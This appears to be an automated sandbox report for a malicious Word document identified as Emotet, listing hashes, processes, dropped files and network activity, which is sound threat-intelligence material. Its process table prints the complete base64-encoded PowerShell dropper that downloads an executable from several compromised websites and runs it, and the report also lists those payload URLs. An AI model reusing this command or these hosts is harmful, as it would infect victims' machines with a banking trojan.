analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

00_29_G-087448.doc_20200729230440

Full analysis: https://app.any.run/tasks/f9298f39-7e42-478d-a4a6-345644cc0b93
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: August 09, 2020, 01:37:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Facere., Author: Antoine Clement, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 29 11:28:00 2020, Last Saved Time/Date: Wed Jul 29 11:28:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 35, Security: 0
MD5:

BAACB06439B2CEE8A566CEA6321D91A2

SHA1:

8BDDA11E2B3FF3B7F92BAB5BA69EF3D5DD65A56E

SHA256:

EEC719798DE02C60D853DFA81688D2668A95E113447753CA1C764D9DD1245E65

SSDEEP:

3072:T4PrXcuQuvpzm4bkiaMQgAlSZ0qmDWaaNSLMLjk:sDRv1m4bnQgISZ0XD4NSLMLjk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powersheLL.exe (PID: 3480)
    • PowerShell script executed

      • powersheLL.exe (PID: 3480)
    • Creates files in the user directory

      • powersheLL.exe (PID: 3480)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2880)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2880)
    • Reads settings of System Certificates

      • chrome.exe (PID: 1672)
    • Reads the hosts file

      • chrome.exe (PID: 2400)
      • chrome.exe (PID: 1672)
    • Manual execution by user

      • chrome.exe (PID: 2400)
    • Application launched itself

      • chrome.exe (PID: 2400)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Facere.
Subject: -
Author: Antoine Clement
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:07:29 10:28:00
ModifyDate: 2020:07:29 10:28:00
Pages: 2
Words: 5
Characters: 35
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 39
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
12
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2880"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\00_29_G-087448.doc_20200729230440.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3480powersheLL -e JABGAFoAUABLAFgAbQB3AGMAPQAnAEcASgBXAEwAQwBrAGEAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBgAFUAUgBgAGkAVAB5AHAAUgBgAG8AVABvAGAAQwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAE8ASwBDAEcAcABjAGoAIAA9ACAAJwA0ADEAMQAnADsAJABHAFgAUwBJAE0AcwBuAHgAPQAnAEcAUgBHAFMASABpAHUAeAAnADsAJABaAFAAWABYAFUAaAB1AGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgATwBLAEMARwBwAGMAagArACcALgBlAHgAZQAnADsAJABQAFMATABCAFMAdQBuAHEAPQAnAFcATQBaAEMARgBlAHUAZAAnADsAJABFAE4ARABDAEgAZQBiAHoAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBFAGIAYwBMAGkAZQBuAHQAOwAkAEQAUwBBAEMATgBqAHUAbAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAdQBoAGEAbABsAG8AdwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHAAbQAyAGsAWAAzADcANAAvACoAaAB0AHQAcAA6AC8ALwBhAGwAYQBrAHMAaQByAC4AYwBvAG0ALwBTAGMAcgBpAHAAdABzAC8AVABXADYATABKAHAAeAAvACoAaAB0AHQAcABzADoALwAvAGMAbABhAHMAcwBpAGMALQByAGUAYwBpAHAAZQBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZQBvAEQASgAxADMALwAqAGgAdAB0AHAAOgAvAC8AZABpAHMAaABuAGMAaABpAHAAcwAuAGMAbwBtAC8ATABpAGIAcgBhAHIAeQAvAFcASwAvACoAaAB0AHQAcAA6AC8ALwBkAHUAbgBjAGEAbgBsAGwAYwAuAGMAbwBtAC8AZwByAG8AdQBuAGQAaQBuAGcAdABoAGUAYwBsAG8AdQBkAC4AbwByAGcALwBOAFEAegB4ADEAMgAvACcALgAiAFMAUABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATQBSAEMAUwBKAHAAbAB3AD0AJwBBAFEATwBEAEgAbgBsAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAWQBWAFYAUgBzAGEAdwAgAGkAbgAgACQARABTAEEAQwBOAGoAdQBsACkAewB0AHIAeQB7ACQARQBOAEQAQwBIAGUAYgB6AC4AIgBkAGAATwBXAE4ATABvAGEAYABkAGYAaQBsAEUAIgAoACQASgBZAFYAVgBSAHMAYQB3ACwAIAAkAFoAUABYAFgAVQBoAHUAYQApADsAJABXAEYARgBZAFUAdwB3AHIAPQAnAEsARQBNAEIAWQBlAHYAaQAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFoAUABYAFgAVQBoAHUAYQApAC4AIgBsAGAARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMgA0ADcAMgA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAZQBBAGAAVABFACIAKAAkAFoAUABYAFgAVQBoAHUAYQApADsAJABYAEkAVgBQAFYAeQBuAGEAPQAnAFQARQBNAFEAVABtAHkAeQAnADsAYgByAGUAYQBrADsAJABPAFcARgBWAFMAZQBiAHMAPQAnAFkAUwBLAEgAWgBoAHoAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAFAASgBBAEgAdwBxAHkAPQAnAFkATgBTAFAAQQBnAHAAdAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2400"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
3244"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x62d1a9d0,0x62d1a9e0,0x62d1a9ecC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
2816"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2480 --on-initialized-event-handle=324 --parent-handle=328 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
3456"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAADgAAAgAQAAAAAAAAAAAGAAAAAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --service-request-channel-token=15079891601684511029 --mojo-platform-channel-handle=1004 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
75.0.3770.100
1672"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --service-request-channel-token=17582376205363116773 --mojo-platform-channel-handle=1608 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
75.0.3770.100
3240"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --instant-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15894771225404834457 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2252 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
75.0.3770.100
2572"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=2916659571460060374 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2472 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
75.0.3770.100
2740"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,1563182660505590080,4936000786068355712,131072 --enable-features=PasswordImport --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=9555915752394036607 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Version:
75.0.3770.100
Total events
2 275
Read events
1 464
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
13
Text files
43
Unknown types
4

Dropped files

PID
Process
Filename
Type
2880WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR114C.tmp.cvr
MD5:
SHA256:
2880WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF34627BCF04986F2D.TMP
MD5:
SHA256:
2880WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFBD32CB963AD497A2.TMP
MD5:
SHA256:
3480powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8GHW8FCRZT0MYKEUBIEW.temp
MD5:
SHA256:
2400chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\172ed73e-de48-4293-b9ce-bde01e5d4ca0.tmp
MD5:
SHA256:
2400chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000032.dbtmp
MD5:
SHA256:
3480powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:A0850076FAAAE7B4EAF7305558E59940
SHA256:AB8DD0A820F260EF05E605A98A6EDD9B1276B4BF7F630647F7578493BA988E55
2880WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:BB120F82B0FCC9DCEAF40AEBF16CB22A
SHA256:5C54D66DE5478B3CC04A408E6BFC14333DDBD5B1963CF3BA56FC8F0399B8B9E8
2880WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:10D8AAF7479958FE7FDA438167054A88
SHA256:81F992AC0DA2ECFC285562AE958151B890374509AC5161F055A0E0B50DB50D55
2400chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF19e2c5.TMPtext
MD5:D11C35B3D5258F594933332C11C6F0F2
SHA256:DC2EB16E16FA3FB258AC31A481F817208CF0C917AF4224F2832588D3A64ADD05
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
13
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3480
powersheLL.exe
GET
200
104.28.4.216:80
http://www.duhallow.com/wp-content/pm2kX374/
US
html
3.96 Kb
malicious
3480
powersheLL.exe
GET
404
74.220.205.241:80
http://dishnchips.com/Library/WK/
US
html
315 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3480
powersheLL.exe
107.154.146.153:443
classic-recipes.com
Incapsula Inc
US
unknown
3480
powersheLL.exe
104.28.4.216:80
www.duhallow.com
Cloudflare Inc
US
shared
3480
powersheLL.exe
74.220.205.241:80
dishnchips.com
Unified Layer
US
unknown
3480
powersheLL.exe
203.123.252.13:80
alaksir.com
Pacific Link Indonesia
ID
suspicious
1672
chrome.exe
172.217.18.163:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
1672
chrome.exe
172.217.16.141:443
accounts.google.com
Google Inc.
US
suspicious
1672
chrome.exe
172.217.23.131:443
fonts.gstatic.com
Google Inc.
US
whitelisted
1672
chrome.exe
216.58.212.138:443
fonts.googleapis.com
Google Inc.
US
whitelisted
1672
chrome.exe
172.217.18.174:443
apis.google.com
Google Inc.
US
whitelisted
1672
chrome.exe
216.58.212.164:443
www.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
www.duhallow.com
  • 104.28.4.216
  • 172.67.168.156
  • 104.28.5.216
malicious
alaksir.com
  • 203.123.252.13
suspicious
classic-recipes.com
  • 107.154.146.153
  • 45.60.96.153
whitelisted
dishnchips.com
  • 74.220.205.241
unknown
duncanllc.com
unknown
clientservices.googleapis.com
  • 172.217.18.163
whitelisted
accounts.google.com
  • 172.217.16.141
shared
www.google.com
  • 216.58.212.164
whitelisted
fonts.googleapis.com
  • 216.58.212.138
whitelisted
www.gstatic.com
  • 216.58.210.3
whitelisted

Threats

No threats detected
No debug info